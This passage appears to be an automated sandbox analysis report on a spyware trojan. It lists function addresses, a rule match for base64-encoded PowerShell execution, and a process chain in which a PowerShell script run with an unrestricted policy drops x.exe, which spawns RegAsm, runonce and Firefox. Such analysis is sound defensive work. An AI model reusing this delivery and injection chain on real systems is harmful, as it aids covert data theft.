Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_0426868E	12_2_0426868E
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_042686D7	12_2_042686D7
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_0426A325	12_2_0426A325
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_0428932E	12_2_0428932E
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_0426A32E	12_2_0426A32E
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_04272B4E	12_2_04272B4E
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C4E4F6	13_2_04C4E4F6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C52446	13_2_04C52446
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C44420	13_2_04C44420
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C60591	13_2_04C60591
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA0535	13_2_04BA0535
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BBC6E0	13_2_04BBC6E0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B9C7C0	13_2_04B9C7C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA0770	13_2_04BA0770
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BC4750	13_2_04BC4750
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C32000	13_2_04C32000
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C581CC	13_2_04C581CC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C541A2	13_2_04C541A2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C601AA	13_2_04C601AA
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C28158	13_2_04C28158
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B90100	13_2_04B90100
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C3A118	13_2_04C3A118
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C202C0	13_2_04C202C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C40274	13_2_04C40274
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C603E6	13_2_04C603E6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BAE3F0	13_2_04BAE3F0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5A352	13_2_04C5A352
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B90CF2	13_2_04B90CF2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C40CB5	13_2_04C40CB5
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA0C00	13_2_04BA0C00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BB8DBF	13_2_04BB8DBF
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B9ADE0	13_2_04B9ADE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BAAD00	13_2_04BAAD00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C3CD1F	13_2_04C3CD1F
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5EEDB	13_2_04C5EEDB
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BB2E90	13_2_04BB2E90
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5CE93	13_2_04C5CE93
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5EE26	13_2_04C5EE26
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA0E59	13_2_04BA0E59
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BACFE0	13_2_04BACFE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C1EFA0	13_2_04C1EFA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B92FC8	13_2_04B92FC8
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C14F40	13_2_04C14F40
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BC0F30	13_2_04BC0F30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BE2F28	13_2_04BE2F28
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C42F30	13_2_04C42F30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B868B8	13_2_04B868B8
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BCE8F0	13_2_04BCE8F0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BAA840	13_2_04BAA840
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA2840	13_2_04BA2840
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA29A0	13_2_04BA29A0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C6A9A6	13_2_04C6A9A6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BB6962	13_2_04BB6962
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B9EA80	13_2_04B9EA80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C56BD7	13_2_04C56BD7
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5AB40	13_2_04C5AB40
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B91460	13_2_04B91460
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5F43F	13_2_04C5F43F
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C695C3	13_2_04C695C3
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C3D5B0	13_2_04C3D5B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C57571	13_2_04C57571
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C516CC	13_2_04C516CC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BE5630	13_2_04BE5630
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B917EC	13_2_04B917EC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5F7B0	13_2_04C5F7B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C4F0CC	13_2_04C4F0CC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5F0E0	13_2_04C5F0E0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C570E9	13_2_04C570E9
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA70C0	13_2_04BA70C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BAB1B0	13_2_04BAB1B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C6B16B	13_2_04C6B16B
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B8F172	13_2_04B8F172
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BD516C	13_2_04BD516C
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA52A0	13_2_04BA52A0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C412ED	13_2_04C412ED
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BBB2C0	13_2_04BBB2C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BE739A	13_2_04BE739A
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5132D	13_2_04C5132D
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B8D34C	13_2_04B8D34C
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5FCF2	13_2_04C5FCF2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C19C32	13_2_04C19C32
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BBFDC0	13_2_04BBFDC0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C51D5A	13_2_04C51D5A
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C57D73	13_2_04C57D73
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA3D40	13_2_04BA3D40
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA9EB0	13_2_04BA9EB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA1F92	13_2_04BA1F92
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B63FD5	13_2_04B63FD5
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B63FD2	13_2_04B63FD2
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5FFB1	13_2_04C5FFB1
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5FF09	13_2_04C5FF09
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA38E0	13_2_04BA38E0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C0D800	13_2_04C0D800
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C35910	13_2_04C35910
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BA9950	13_2_04BA9950
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BBB950	13_2_04BBB950
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C4DAC6	13_2_04C4DAC6
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BE5AA0	13_2_04BE5AA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C41AA3	13_2_04C41AA3
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C3DAAC	13_2_04C3DAAC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C57A46	13_2_04C57A46
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5FA49	13_2_04C5FA49
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C13A6C	13_2_04C13A6C
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C15BF0	13_2_04C15BF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BBFB80	13_2_04BBFB80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04BDDBF9	13_2_04BDDBF9
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04C5FB76	13_2_04C5FB76
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C31FD0	13_2_02C31FD0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C2CE47	13_2_02C2CE47
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C2CE50	13_2_02C2CE50
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C2B060	13_2_02C2B060
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C2D070	13_2_02C2D070
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C2B1F9	13_2_02C2B1F9
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C2B1A4	13_2_02C2B1A4
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C2B1B0	13_2_02C2B1B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C35670	13_2_02C35670
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C33880	13_2_02C33880
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C3387B	13_2_02C3387B
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_02C4BE50	13_2_02C4BE50
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04A0E467	13_2_04A0E467
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04A0E7FC	13_2_04A0E7FC
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04A0D8C8	13_2_04A0D8C8
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 14_2_055EC6DE	14_2_055EC6DE
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 14_2_055EC6D5	14_2_055EC6D5
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 14_2_055F4EFE	14_2_055F4EFE
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 14_2_0560B6DE	14_2_0560B6DE
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 14_2_055F310E	14_2_055F310E
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 14_2_055F3109	14_2_055F3109
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 14_2_055F185E	14_2_055F185E
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 14_2_055EC8FE	14_2_055EC8FE
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 14_2_055EA8EE	14_2_055EA8EE
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 14_2_055EAA3E	14_2_055EAA3E
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 14_2_055EAA32	14_2_055EAA32
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 14_2_055EAA87	14_2_055EAA87

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0287F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 027EB970 appears 283 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02847E54 appears 109 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02835130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0286EA12 appears 86 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 04C1F290 appears 105 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 04BD5130 appears 58 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 04BE7E54 appears 109 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 04B8B970 appears 283 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 04C0EA12 appears 86 times

Source: Process Memory Space: powershell.exe PID: 8104, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: x.exe.2.dr, -----------------------------------------.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.powershell.exe.66d7ef8.0.raw.unpack, -----------------------------------------.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winPS1@11/8@5/5

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

Source: C:\Users\user\AppData\Local\Temp\x.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\laser.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\laser.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
Source: C:\Windows\SysWOW64\runonce.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: efswrt.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
